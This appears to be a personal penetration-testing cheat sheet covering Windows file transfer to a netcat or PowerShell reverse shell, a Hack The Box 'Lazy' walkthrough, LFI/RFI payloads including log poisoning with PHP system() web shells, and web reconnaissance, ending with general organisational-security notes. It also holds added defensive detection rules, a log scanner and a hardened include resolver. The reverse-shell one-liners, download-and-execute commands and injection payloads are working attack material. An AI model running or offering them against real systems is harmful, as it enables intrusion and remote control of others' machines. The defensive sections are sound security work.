Windows Non-Interactive Command Execution to Interactive Netcat Reverse Shell

File Transfer with ftp

Hacker Tab1:
nc -nvlp 4444
Hacker Tab2:
//Install python-pyftpdlib to run an FTP server
apt-get install python-pyftpdlib
python -m pyftpdlib -p 21
Victim:
//Note: keep a space before ">" here; cmd reads "21>" as "2" followed by the redirect "1>", so the port would be written as 2
echo open 192.168.133.130 21 > ftp.txt
//anonymous user, then anonymous password
echo anonymous>> ftp.txt
echo anonymous>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

nc.exe 192.168.133.130 4444 -e cmd.exe

Transfer shell with VBS

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo  Err.Clear >> wget.vbs
echo  Set http = Nothing >> wget.vbs
echo  Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo  http.Open "GET", strURL, False >> wget.vbs
echo  http.Send >> wget.vbs
echo  varByteArray = http.ResponseBody >> wget.vbs
echo  Set http = Nothing >> wget.vbs
echo  Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo  Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo  strData = "" >> wget.vbs
echo  strBuffer = "" >> wget.vbs
echo  For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo  ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo  Next >> wget.vbs
echo  ts.Close >> wget.vbs
 
cscript wget.vbs http://192.168.133.130/nc.exe nc.exe

nc.exe 192.168.133.130 4444 -e cmd.exe

PowerShell


echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.133.130/nc.exe" >>wget.ps1
echo $file = "nc1.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

nc1.exe 192.168.133.130 4444 -e cmd.exe

SMB

Hacker Tab1:
nc -nvlp 4444
Hacker Tab2:

Victim:
//net view \\192.168.133.130
//dir \\192.168.133.130\sahi
copy \\192.168.133.130\sahi\nc.exe nc.exe
nc.exe 192.168.133.130 4444 -e cmd
or
\\192.168.133.130\sahi\evil.exe

PowerShell one-liner reverse shell

powershell $client = New-Object System.Net.Sockets.TCPClient("192.168.133.130",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
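The transfer-and-execute steps above all leave a recognisable process command line or script block behind. The following is an added detection example, not part of the original notes: it runs a small rule set over command lines of the kind a process-creation or script-block log would record and flags the scripted ftp transfer, the cscript downloader, the -ExecutionPolicy Bypass invocation, WebClient and TCPClient use, the copy from a UNC share, and the nc -e shell. The sample command lines in SAMPLE_CMDLINES are constructed to mirror the ones above plus benign noise; the rule names are my own.

```python
"""
Detection logic for the download-and-execute patterns shown above (scripted
ftp transfers, cscript downloaders, PowerShell with -ExecutionPolicy Bypass,
WebClient/TCPClient use, copying executables from a UNC share, nc -e shells).
Added example; input is one command line (or script-block text) per string,
as a process-creation or script-block log would give it to you.
"""
import re

# (rule name, regex applied to the lowercased command line)
RULES = [
    ("ftp-scripted-transfer",
     re.compile(r"\bftp(\.exe)?\s+.*-s:")),                          # ftp -s:script.txt
    ("cscript-url-download",
     re.compile(r"\bcscript(\.exe)?\s+\S+\.vbs\s+https?://")),       # cscript x.vbs http://...
    ("powershell-policy-bypass",
     re.compile(r"\bpowershell(\.exe)?\s.*-executionpolicy\s+bypass")),
    ("powershell-webclient-download",
     re.compile(r"net\.webclient|downloadfile\(|downloadstring\(")),
    ("powershell-tcpclient-shell",
     re.compile(r"net\.sockets\.tcpclient")),
    ("unc-copy-executable",
     re.compile(r"\bcopy\s+\\\\\d{1,3}(?:\.\d{1,3}){3}\\\S+\.exe")),  # copy \\ip\share\x.exe
    ("netcat-exec-shell",
     re.compile(r"\bnc\d*(\.exe)?\s+\S+\s+\d+\s+-e\s+cmd")),          # nc[1].exe ip port -e cmd
]

# Constructed for this example: the lines above plus benign noise.
SAMPLE_CMDLINES = [
    r"ftp -s:ftp.txt",
    r"cscript wget.vbs http://192.168.133.130/nc.exe nc.exe",
    r"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1",
    r"$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile($url,$file)",
    r"copy \\192.168.133.130\sahi\nc.exe nc.exe",
    r"nc1.exe 192.168.133.130 4444 -e cmd.exe",
    r'powershell $client = New-Object System.Net.Sockets.TCPClient("192.168.133.130",4444);',
    r"ping -n 1 192.168.133.130",
    r"ftp ftp.example.com",
    r"copy C:\Users\alice\report.docx D:\backup\reports",
]


def classify(cmdline):
    """Names of every rule the command line triggers (empty list if none)."""
    text = cmdline.lower()
    return [name for name, rx in RULES if rx.search(text)]


def scan(cmdlines):
    """Return [(cmdline, [rule, ...]), ...] for lines that trigger at least one rule."""
    findings = []
    for line in cmdlines:
        hits = classify(line)
        if hits:
            findings.append((line, hits))
    return findings


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_CMDLINES):
        print(f"{', '.join(hits):32s} {line}")
```

Matching is done on the lowercased text because cmd and PowerShell are case-insensitive, so an attacker gains nothing from `-ExEcUtIoNpOlIcY`. Expect the WebClient rule to fire on legitimate admin scripts too; tune it with the parent process and the user rather than dropping it.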

HTB Lazy Machine – Walkthrough

Scanning with nmap

The anonymous FTP account allows read/write access to the web server's home directory.

Let's create a meterpreter reverse shell in ASPX.

Uploading the ASPX shell using the FileZilla FTP client.

Triggering the uploaded exploit.

Meterpreter reverse session received.

Now it's time for privilege escalation. Let's find local exploits for privilege escalation.

Let's try ms10_015_kitrap0d.

And we received a meterpreter session running as NT Authority.

Let's grab the user CTF.

And the root CTF.

File Inclusion LFI/RFI

Local File Inclusion

?file=../../../../etc/passwd

?file=../../../../etc/passwd%00

?file=../../../../etc/passwd%00jpg

Environment File

/proc/self/environ

Payloads:

User-Agent: <?php system($_GET['cmd']); ?>

?page=/proc/self/environ&cmd=ls

?page=/proc/self/environ&cmd=python -c 'shell…'

Apache Logs

/var/log/apache2/access.log

../../../../var/log/apache/error.log

Payload

GET /<?php system($_GET['cmd']);?>

SSH Logs

/var/log/auth.log

Payload

ssh '<?php system($_GET["cmd"]);?>'@VICTIM-IP

Sending emails

mail -s 'This is email subject: <?php system($_GET["cmd"]);?>' user@domain < /dev/null

Include: /var/mail/user
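Each of the poisoning routes above (User-Agent into the environment, request line into the Apache log, username into auth.log, subject line into the mail spool) works by getting a PHP open tag into a file the application later includes. Scanning those files for PHP tags is the corresponding detection. Below is an added example, not part of the original notes, that does this over constructed access.log, auth.log and mail lines; the severity labels and the sink list are my own choices.

```python
"""
Log-poisoning detection: scan web, SSH and mail log lines for PHP open tags
(what the User-Agent, request-line, SSH-username and mail-subject payloads
above leave behind) and rate a hit higher when a code-execution sink such as
system() or eval() is present on the same line. Added example; every line
in SAMPLE_LOGS is constructed.
"""
import re

PHP_TAG = re.compile(r"<\?(php|=)?", re.I)                      # <?php, <?=, or bare <?
SINKS = re.compile(r"\b(system|exec|shell_exec|passthru|eval|assert)\s*\(", re.I)

SAMPLE_LOGS = {  # constructed for this example
    "access.log": [
        '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
        '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "<?php system($_GET[\'cmd\']); ?>"',
        '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /<?php system($_GET[\'cmd\']);?> HTTP/1.1" 404 200 "-" "curl/7.88"',
    ],
    "auth.log": [
        "Jan  1 10:00:03 web sshd[1234]: Invalid user alice from 10.0.0.9 port 40000",
        "Jan  1 10:00:04 web sshd[1235]: Invalid user <?php system($_GET['cmd']);?> from 10.0.0.9 port 40001",
    ],
    "mail": [
        "Subject: weekly report",
        "Subject: This is email subject: <?php system($_GET['cmd']);?>",
    ],
}


def find_poisoned(lines):
    """Return [(line_no, severity, line)] for lines containing a PHP tag.

    severity is "high" when an execution sink is on the same line, else "medium".
    """
    hits = []
    for i, line in enumerate(lines):
        if PHP_TAG.search(line):
            severity = "high" if SINKS.search(line) else "medium"
            hits.append((i, severity, line))
    return hits


def scan_all(logs):
    """Run find_poisoned over every named log; returns {name: [hits]}."""
    return {name: find_poisoned(lines) for name, lines in logs.items()}


if __name__ == "__main__":
    for name, hits in scan_all(SAMPLE_LOGS).items():
        for line_no, severity, line in hits:
            print(f"{name}:{line_no} [{severity}] {line}")
```

A bare `<?` will also match an XML prolog (`<?xml`) if request bodies are logged, so add an exclusion for that before running this against real traffic. Finding a tag in a log is evidence of an attempt; whether it is exploitable depends on the include being reachable, which is what the allowlist fix for the include itself removes.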

Php://filter

Index + Index.php

?file=php://filter/read=convert.base64-encode/resource=FILETOREAD

?file=php://filter/read=convert.base64-encode/resource=../../config.php

Php://input

?file=php://input

With post data

<?php system('wget http://x.x.x.x/php-shell.php -O /var/www/html/shell.php'); ?>

<?php phpinfo(); ?>

data://

?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2fPg%3d%3d

?file=data:text/plain;,<?php echo shell_exec($_GET['cmd']);?>

zip://

zip://archive.zip#file.php

phar://

/proc/self/fd/#


Session Files

/tmp/sess_[SESSID]

/tmp/php5/sess_[SESSID]

Including images

You can append PHP code to the end of an image, upload it, and then include it.

Using encoding

?file=..%2F..%2F..%2F..%2F..%2Fetc/passwd

?file=....//....//....//....//....//etc/passwd

Expect

?file=expect://ls

Note: null byte injection was fixed in PHP 5.3.4, so it does not work on later versions.

To get around the null-byte fix, make the file path longer than 4096 characters (path truncation vulnerability):

?file=../../../etc/passwd/./././././ (repeat ./ a thousand times)

Or the reverse path truncation vulnerability:

?file=../../../../(repeat ./ a thousand times)etc/passwd

Proc File System

/proc/sched_debug // find pid

/proc/mounts

/proc/net/arp

/proc/net/route

/proc/net/tcp and /proc/net/udp

/proc/net/fib_trie

/proc/version

Query process

/proc/[PID]/cmdline

/proc/[PID]/environ

/proc/[PID]/cwd

/proc/[PID]/fd/[#] // find error and access log files

/proc/self/cmdline

/proc/self/stat

/proc/self/status

/proc/self/fd/[#]

RFI

?file=[http|https|ftp]://websec.wordpress.com/shell.txt

(requires allow_url_fopen=On and allow_url_include=On)
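The wrappers (php://, data:, expect://, zip://, phar://), the encoding and ....// variants, the %00 suffix, the path-truncation padding and the remote URL above all target the same weak spot: an include whose path is built from the raw ?file= parameter. The following is an added example, not from the original notes, of the hardened resolver that closes every one of them; it is written in Python for illustration, and a PHP include would apply exactly the same checks. BASE_DIR, ALLOWED_PAGES, MAX_LEN and the error strings are my assumptions.

```python
"""
Hardened include-path resolver: the defensive counterpart of the traversal,
encoding, null-byte, path-truncation and wrapper payloads listed above.
Added example (Python for illustration; the same checks apply to a PHP
include). The base directory and the page allowlist are assumptions.
"""
import os
import re
from urllib.parse import unquote

BASE_DIR = os.path.realpath("/var/www/pages")   # assumed template directory
ALLOWED_PAGES = {"index", "about", "contact"}    # assumed allowlist of page names
MAX_LEN = 255                                    # refuse long input before any path work
MAX_DECODE_ROUNDS = 3                            # enough to see %252F-style double encoding

WRAPPER_OR_URL = re.compile(r"^[a-z][a-z0-9+.-]*:", re.I)   # php:, data:, expect:, zip:, phar:, http:
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]+")                   # no '/', '.', '%', ':' at all


class UnsafeInclude(ValueError):
    """Raised with a short reason when the parameter must not be included."""


def decode_fully(value):
    """Percent-decode until the value stops changing (bounded), so %2F, %252F and %00 are all visible."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_include(param):
    """Map a user-supplied ?file= value to a file path inside BASE_DIR, or raise UnsafeInclude."""
    if len(param) > MAX_LEN:
        raise UnsafeInclude("parameter too long")            # defeats 4096-byte path-truncation padding
    name = decode_fully(param)
    if "\x00" in name:
        raise UnsafeInclude("null byte in path")             # %00 and %00jpg suffix tricks
    if WRAPPER_OR_URL.match(name):
        raise UnsafeInclude("stream wrapper / URL not allowed")
    if not PAGE_NAME.fullmatch(name):
        raise UnsafeInclude("page name may only contain [A-Za-z0-9_-]")   # ../, ..%2F, ....// all fail here
    if name not in ALLOWED_PAGES:
        raise UnsafeInclude("page not in allowlist")
    path = os.path.realpath(os.path.join(BASE_DIR, name + ".php"))
    # defence in depth: even an allowlisted name must resolve inside BASE_DIR
    if os.path.commonpath([path, BASE_DIR]) != BASE_DIR:
        raise UnsafeInclude("resolved outside base directory")
    return path


def reject_reason(param):
    """None if the parameter is acceptable, otherwise the reason it was rejected."""
    try:
        resolve_include(param)
        return None
    except UnsafeInclude as exc:
        return str(exc)


if __name__ == "__main__":
    # Constructed inputs: the page's own payloads plus two legitimate names.
    for p in ["index", "admin", "../../../../etc/passwd%00jpg",
              "..%2F..%2F..%2F..%2F..%2Fetc/passwd", "....//....//etc/passwd",
              "php://filter/read=convert.base64-encode/resource=../../config.php",
              "expect://ls", "http://websec.wordpress.com/shell.txt",
              "../../../etc/passwd/" + "./" * 2100]:
        print(f"{p[:60]:60s} -> {reject_reason(p) or 'OK: ' + resolve_include(p)}")
```

The order matters: the length check runs before decoding, so a short encoded value can't hide an enormous decoded path, and the allowlist runs before any filesystem call, so realpath is never asked to resolve attacker-controlled components. Because the allowlist already forbids ':' and '/', the wrapper check is redundant; it is kept only so the rejection reason names the wrapper in the log. On the PHP side, allow_url_include=Off and allow_url_fopen=Off still belong in php.ini as the second layer for the RFI case.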

Files to check

https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion%20-%20Path%20Traversal/Intruders/List_Of_File_To_Include.txt

https://raw.githubusercontent.com/tennc/fuzzdb/master/dict/BURP-PayLoad/LFI/LFI-FD-check.txt

https://raw.githubusercontent.com/D35m0nd142/LFISuite/master/pathtotest.txt

https://github.com/D35m0nd142/LFISuite/blob/master/pathtotest_huge.txt

Windows File Check

https://raw.githubusercontent.com/tennc/fuzzdb/master/dict/BURP-PayLoad/LFI/LFI-WinblowsFileCheck.txt

Payloads for File Inclusion

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal

https://github.com/swisskyrepo/PayloadsAllTheThings

Web Application Information Gathering

1 Conduct Google/Shodan/Censys Discovery and Reconnaissance for Information Leakage
2 Fingerprint Web Server
3 Review Webserver Metafiles for Information Leakage, robots.txt
4 Enumerate Applications on Webserver
5 Review Webpage Comments and Metadata for Information Leakage
6 Identify application entry points
7 Map execution paths through application
8 Fingerprint Web Application Framework
9 Fingerprint Web Application
10 Map Application Architecture
11 Find subdomains
12 Find IP Address for domain
13 Identify WAF
14 Find Real IP address for domain, if applicable

Finding Subdomains

Online websites:
https://pentest-tools.com/information-gathering/find-subdomains-of-domain
https://dnsdumpster.com/
https://hackertarget.com/find-dns-host-records/
https://findsubdomains.com/
https://searchdns.netcraft.com
https://censys.io
Tools:
Subbrute – a DNS meta-query spider that pulls DNS records and subdomain lists.
DNScan – a DNS subdomain scanner, written in Python, that can be installed on a server.
Sublist3r – a very fast domain and subdomain enumeration tool, also written in Python.
Knock – also known as Knockpy, as it is written in Python; freely available on GitHub.
Recon-Ng – a larger framework whose brute_hosts module brute-forces subdomains of a domain.
DNSRecon – included in Kali Linux.


Reverse DNS lookup

“whois lookup registered to” inurl:ip-address-lookup
“whois lookup registered to” inurl:domaintools

Then run fierce with -range on the IP ranges you find to look up DNS names:

fierce -range 202.147.169.1-205 -dnsserver 8.8.8.8


How to find the real IP address of a website behind a cloud-based firewall

1- Censys
https://censys.io/
2- Shodan
https://www.shodan.io/
3- zoomeye
https://www.zoomeye.org/
4- securitytrails/dnstrail
https://securitytrails.com/
5- crimeflare
http://crimeflare.com/
6- netcraft
https://toolbar.netcraft.com/site_report
7- DNS lookup for MX record misconfiguration
8- Subdomain lookup
9- Website leaking its IP address through email headers
10- Reverse lookup of IP ranges for the target company, and banner grab on port 80
11- WordPress pingback
12- External avatars

Organization Security

Site: a location where data is backed up onto drives for later use in case of disaster.

Cold Site: bringing servers back into production takes time because facilities such as electricity and network connectivity are lacking, but the backups are there and can be used to bring systems back.

Warm Site: has basic facilities that fall short of the actual production environment. Electricity, a backup generator and network connectivity are there, but speed and capacity are lower, allowing only the necessary operations.

Hot Site: an exact replica of the production environment, with very little downtime.

Redundancy Planning

Single point of failure

RAID, redundant array of inexpensive disks

Redundant servers, ISP

UPS

Backup generators

Spare parts (e.g. server hard disks)

Disruptions:

1- Non disaster

2- Disaster

3- Catastrophic

Disaster Recovery Procedures

Planning

Exercises

Backup and storage

Restoration

Incident Response

  • Incident response defined
  • Forensics
  • Chain of Custody
  • First Response
  • Damage/Loss


Secure disposal: paper shredder, hard drive shredder

AUP, acceptable use policy

Mandatory vacations force a rotation of duties.

PII, personally identifiable information, must not fall into the wrong hands.

Due Care,

Due diligence: reasonable steps taken by a person to avoid an offense.

Due process,

SLA, Service Level Agreement, agreement between you and your company.

Social Engineering

Phishing

Hoaxes

Dumpster diving

End user awareness